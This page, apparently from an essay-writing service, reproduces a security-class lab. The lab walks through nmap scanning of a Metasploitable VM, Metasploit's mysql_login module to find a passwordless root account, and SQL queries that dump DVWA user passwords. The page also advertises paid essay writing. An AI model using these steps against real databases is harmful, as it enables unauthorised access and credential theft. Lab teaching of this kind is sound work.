Linux commands | Information Systems homework help

  

Database Attack Lab

Class: SEC6070

Name:

Date: 

This lab will follow a database penetration test from beginning to end in order to illustrate, in a hands-on way, the steps necessary to fully compromise a database. You will use a Metasploit module to identify an account you may use to login. Once logged in you will use SQL commands to explore the database.

1. If Metasploitable isn’t already running launch the Metasploitable VM.

2. At the user logon prompt type: msfadmin

3. At the password prompt type: msfadmin

4. Type: ifconfig

a. Paste your screenshot here:- 

5. Record the IP address here: This is your RHOST or ‘remote host’

Now switch to Kali.

6. Open a shell by clicking on the black box next to the word “Places”. 

7. Type: service postgresql start

a. Paste your screenshot here:- 

8. Type: msfconsole

a. Paste your screenshot here:- 

9. Scan your target for database technologies. Try to identify running database services on your target’s ports. 

a. Type: nmap x.x.x.x (substitute x.x.x.x for the ip address of your REMOTE host)

b. Paste your screenshot here:- 

Success! We’re identified multiple instances of database technologies running on our target. Let’s choose a service to target. For this example we’ll select MySQL.

10. Metasploit has multiple MySQL exploits. 

a.Type: search mysql

b. Paste your screenshot here:- 

11. Type: use auxiliary/scanner/mysql/mysql_login

12. Type: info

13. Type: set rhosts x.x.x.x (substitute x.x.x.x for the ip address of your REMOTE host)

14. Type: set username root

15. Type: set stop_on_success true

16. Let’s confirm the changes you made took. Type: info

17. a. Paste your screenshot here:- 

18. Type: exploit

a. Paste your screenshot here:- 

You determined the username root has no password. Congratulations. Let’s test our access to the MySQL database.

19. Open a new shell by clicking on the black box to the right of the word “Places”.

20. Type: mysql –h x.x.x.x  –u root (substitute x.x.x.x for the ip address of your REMOTE host)

a. Paste your screenshot here:- 

21. Type: show databases;

a. Paste your screenshot here:-  

22. Let’s pick a database and explore it. Type: use dvwa;

a. Paste your screenshot here:- 

23. Now that we’ve picked a database let’s view the tables. Type: show tables;

a. Paste your screenshot here:- 

24. Let’s see what data is being held in this table. Type: show columns from users;

a. Paste your screenshot here:- 

25. Columns of interest are “user” and “password”. Type: select user, password from users;

a. Paste your screenshot here:- 

26. You’ve successfully scanned for a database technology, found a vulnerable database service running on a target’s port, located the appropriate exploit for use and ran it. Now try exploiting a different database vulnerability, such as Postgresql. 

Congratulations, you’ve used a Metasploit module to attack a database. You’ve accessed a database, enumerated the tables, identified fields of interest, and inspected their contents.

   W

Calculate Your Essay Price
(550 words)

Approximate price: $22

Calculate the price of your order

550 words
We'll send you the first draft for approval by September 11, 2018 at 10:52 AM
Total price:
$26
The price is based on these factors:
Academic level
Number of pages
Urgency
Basic features
  • Free title page and bibliography
  • Unlimited revisions
  • Plagiarism-free guarantee
  • Money-back guarantee
  • 24/7 support
On-demand options
  • Writer’s samples
  • Part-by-part delivery
  • Overnight delivery
  • Copies of used sources
  • Expert Proofreading
Paper format
  • 275 words per page
  • 12 pt Arial/Times New Roman
  • Double line spacing
  • Any citation style (APA, MLA, Chicago/Turabian, Harvard)

Our guarantees

Delivering a high-quality product at a reasonable price is not enough anymore.
That’s why we have developed 5 beneficial guarantees that will make your experience with our service enjoyable, easy, and safe.

Money-back guarantee

You have to be 100% sure of the quality of your product to give a money-back guarantee. This describes us perfectly. Make sure that this guarantee is totally transparent.

Read more

Zero-plagiarism guarantee

Each paper is composed from scratch, according to your instructions. It is then checked by our plagiarism-detection software. There is no gap where plagiarism could squeeze in.

Read more

Free-revision policy

Thanks to our free revisions, there is no way for you to be unsatisfied. We will work on your paper until you are completely happy with the result.

Read more

Privacy policy

Your email is safe, as we store it according to international data protection rules. Your bank details are secure, as we use only reliable payment systems.

Read more

Fair-cooperation guarantee

By sending us your money, you buy the service we provide. Check out our terms and conditions if you prefer business talks to be laid out in official language.

Read more